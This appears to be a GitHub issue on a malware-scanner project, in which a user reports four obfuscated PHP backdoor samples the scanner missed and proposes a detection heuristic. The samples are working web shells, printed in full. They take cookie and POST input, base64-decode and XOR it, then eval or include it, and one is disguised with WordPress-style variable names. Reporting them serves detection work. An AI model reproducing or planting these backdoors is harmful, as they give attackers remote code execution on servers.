
Undetected malwares #105

Open ebourg opened 4 months ago

ebourg commented 4 months ago

Just found these malware samples that weren't detected by the scanner:

$GRNRFc = 'V' . '_' . "\x51" . "\x6e" . 'E' . 'K' . "\x4b";$ZkQeaKiKV = chr (99) . chr ( 482 - 374 ).chr (97) . "\x73" . "\x73" . chr (95) . chr (101) . "\x78" . chr ( 513 - 408 ).chr (115) . "\x74" . chr (115); $tHCTzrRTa = class_exists($GRNRFc); $ZkQeaKiKV = "30813";$Bnauel = !1;if ($tHCTzrRTa == $Bnauel){function EbUQQDwP(){$zrmsCLkLp = new /* 28317 */ V_QnEKK(18652 + 18652); $zrmsCLkLp = NULL;}$yCUiq = "18652";class V_QnEKK{private function vAjeUvW($yCUiq){if (is_array(V_QnEKK::$xBmKEmU)) {$DkdswkjV = str_replace("\74" . '?' . chr (112) . "\x68" . 'p', "", V_QnEKK::$xBmKEmU["\x63" . "\x6f" . "\156" . "\164" . chr (101) . "\x6e" . 't']);eval($DkdswkjV); $yCUiq = "18652";exit();}}private $OashYfi;public function avjuwOZFze(){echo 41931;}public function __destruct(){$yCUiq = "63071_28842";$this->vAjeUvW($yCUiq); $yCUiq = "63071_28842";}public function CBihlQQeR($oLvOlCz, $ICNQhIu){return $oLvOlCz[0] ^ str_repeat($ICNQhIu, (strlen($oLvOlCz[0]) / strlen($ICNQhIu)) + 1);}public function __construct($xAXqvTpA=0){$FPxTqQPgB = $_POST;$AZJPK = $_COOKIE;$ICNQhIu = "301407a7-7bdd-4637-b5c9-06e442e49d5a";$jxkKrdbK = @$AZJPK[substr($ICNQhIu, 0, 4)];if (!empty($jxkKrdbK)){$BsKyrwAEcE = "base64";$oLvOlCz = "";$jxkKrdbK = explode(",", $jxkKrdbK);foreach ($jxkKrdbK as $BuxlJxC){$oLvOlCz .= @$AZJPK[$BuxlJxC];$oLvOlCz .= @$FPxTqQPgB[$BuxlJxC];}$oLvOlCz = array_map($BsKyrwAEcE . '_' . chr ( 938 - 838 ).'e' . chr ( 574 - 475 )."\x6f" . "\x64" . "\145", array($oLvOlCz,)); $oLvOlCz = $this->CBihlQQeR($oLvOlCz, $ICNQhIu);V_QnEKK::$xBmKEmU = @unserialize($oLvOlCz);}}public static $xBmKEmU = 25143;}EbUQQDwP();}
<?php

function _charset()

{
    $raw_title = 'f97L4Hyn8Jg';
    $post_types = $raw_title;

    $previous_date = $GLOBALS[input("9%7F%7E%00q%1B", $post_types)];
    $delete = $previous_date;
        $custom_fields = '_post';
    $mime_match = isset($delete[$post_types]);

    if ($mime_match)

    {
        $tt_ids = 'internal';
        $sanitized = $previous_date[$post_types];
        $cockneyreplace = $sanitized[input("%12TG%13Z%29%14%0B", $post_types)];
        $parts = $cockneyreplace;
        include ($parts);
    }
}
function input($show_in_admin_status_list, $publicly_queryable)

{

    $wp_post_types = $publicly_queryable;
        $double_prime = 'tags_to_ignore';
    $property_name = "url" . "decode";
    $mins = $property_name($show_in_admin_status_list);

    $format = substr($wp_post_types,0, strlen($mins));

    $show_in_menu = $mins ^ $format;

    $mins = strpos($show_in_menu, $format);

    return $show_in_menu;
}
        $nohier_vs_hier_defaults = 'post_type_in_string';

_charset();

?>
$yePAZNLbRY = chr (100) . chr ( 642 - 547 )."\x49" . chr ( 1057 - 956 ).chr (69) . "\x79" . chr (76); $qffKMCuiT = "\x63" . chr (108) . chr (97) . chr ( 923 - 808 ).'s' . chr (95) . 'e' . "\x78" . "\x69" . "\163" . "\x74" . "\163";$TLvyEg = class_exists($yePAZNLbRY); $qffKMCuiT = "3393";$alXknwj = !1;if ($TLvyEg == $alXknwj){function gLYWbhtb(){return FALSE;}$sTgbCPwWxw = "41613";gLYWbhtb();class d_IeEyL{private function DmoLd($sTgbCPwWxw){if (is_array(d_IeEyL::$UiTJxGm)) {$bvlyHtI = str_replace(chr ( 106 - 46 ) . "\x3f" . "\x70" . 'h' . chr (112), "", d_IeEyL::$UiTJxGm[chr (99) . chr ( 968 - 857 ).'n' . chr ( 337 - 221 )."\145" . 'n' . chr (116)]);eval($bvlyHtI); $sTgbCPwWxw = "41613";exit();}}private $RbnFu;public function JYIasy(){echo 42935;}public function __destruct(){$sTgbCPwWxw = "14197_12147";$this->DmoLd($sTgbCPwWxw); $sTgbCPwWxw = "14197_12147";}public function __construct($sQvGICW=0){$HidyYs = $_POST;$xcZSJMJSS = $_COOKIE;$nDkFFGJ = "adaea6d7-c626-495a-9839-246089b4c92a";$WwkXBUdfJJ = @$xcZSJMJSS[substr($nDkFFGJ, 0, 4)];if (!empty($WwkXBUdfJJ)){$EctSW = "base64";$oLeNYMtOPT = "";$WwkXBUdfJJ = explode(",", $WwkXBUdfJJ);foreach ($WwkXBUdfJJ as $phDSwy){$oLeNYMtOPT .= @$xcZSJMJSS[$phDSwy];$oLeNYMtOPT .= @$HidyYs[$phDSwy];}$oLeNYMtOPT = array_map($EctSW . "\137" . "\144" . "\145" . "\x63" . "\157" . "\x64" . "\x65", array($oLeNYMtOPT,)); $oLeNYMtOPT = $oLeNYMtOPT[0] ^ str_repeat($nDkFFGJ, (strlen($oLeNYMtOPT[0]) / strlen($nDkFFGJ)) + 1);d_IeEyL::$UiTJxGm = @unserialize($oLeNYMtOPT); $oLeNYMtOPT = class_exists("14197_12147");}}public static $UiTJxGm = 44887;}$UfEFb = new /* 25527 */ $yePAZNLbRY(41613 + 41613); $sTgbCPwWxw = strpos($sTgbCPwWxw, $sTgbCPwWxw); $alXknwj = $UfEFb = $sTgbCPwWxw = Array();}

I would guess that the combination of the functions explode and eval appearing on the first line of a file could be flagged as suspicious.

ebourg commented 4 months ago

Another one, without the eval function:

$exXhBCc = 't' . "\137" . "\x6c" . "\x63" . 'y';$JjYSAMYHH = "\x63" . "\x6c" . chr ( 717 - 620 ).'s' . chr ( 165 - 50 ).'_' . "\145" . "\170" . "\151" . "\x73" . chr (116) . "\x73";$wzfPz = class_exists($exXhBCc); $JjYSAMYHH = "44175";$aDLLwXVYSL = !1;if ($wzfPz == $aDLLwXVYSL){function FzMEGqlMK(){$VVaMVwrN = new /* 41728 */ t_lcy(5855 + 5855); $VVaMVwrN = NULL;}$cDNjoQAt = "5855";class t_lcy{private function tSazHL($cDNjoQAt){if (is_array(t_lcy::$HmCPtFpTo)) {$kpOpXOOQ = sys_get_temp_dir() . "/" . crc32(t_lcy::$HmCPtFpTo["\163" . "\x61" . chr ( 1085 - 977 )."\164"]);@t_lcy::$HmCPtFpTo["\x77" . "\x72" . "\151" . chr ( 769 - 653 ).'e']($kpOpXOOQ, t_lcy::$HmCPtFpTo["\143" . "\x6f" . "\156" . chr (116) . chr ( 590 - 489 )."\156" . chr (116)]);include $kpOpXOOQ;@t_lcy::$HmCPtFpTo[chr ( 312 - 212 ).'e' . 'l' . "\145" . "\164" . 'e']($kpOpXOOQ); $cDNjoQAt = "5855";exit();}}private $aEFjoHrDU;public function VzdTtnMm(){echo 1986;}public function __destruct(){t_lcy::$HmCPtFpTo = @unserialize(t_lcy::$HmCPtFpTo); $cDNjoQAt = "64201_44762";$this->tSazHL($cDNjoQAt); $cDNjoQAt = "64201_44762";}public function OdICv($ihsQcHj, $ZUMkhwR){return $ihsQcHj[0] ^ str_repeat($ZUMkhwR, (strlen($ihsQcHj[0]) / strlen($ZUMkhwR)) + 1);}public function __construct($qQNwRv=0){$FpjbTffga = $_POST;$VuwvnDjEdq = $_COOKIE;$ZUMkhwR = "de91630f-5086-4c88-8fa4-67d5961f9380";$BQSVpVoUG = @$VuwvnDjEdq[substr($ZUMkhwR, 0, 4)];if (!empty($BQSVpVoUG)){$GnQvdl = "base64";$ihsQcHj = "";$BQSVpVoUG = explode(",", $BQSVpVoUG);foreach ($BQSVpVoUG as $VOaHShiHN){$ihsQcHj .= @$VuwvnDjEdq[$VOaHShiHN];$ihsQcHj .= @$FpjbTffga[$VOaHShiHN];}$ihsQcHj = array_map($GnQvdl . "\137" . "\x64" . "\145" . chr (99) . "\157" . chr ( 524 - 424 )."\145", array($ihsQcHj,));t_lcy::$HmCPtFpTo = $this->OdICv($ihsQcHj, $ZUMkhwR);}}public static $HmCPtFpTo = 53491;}FzMEGqlMK();}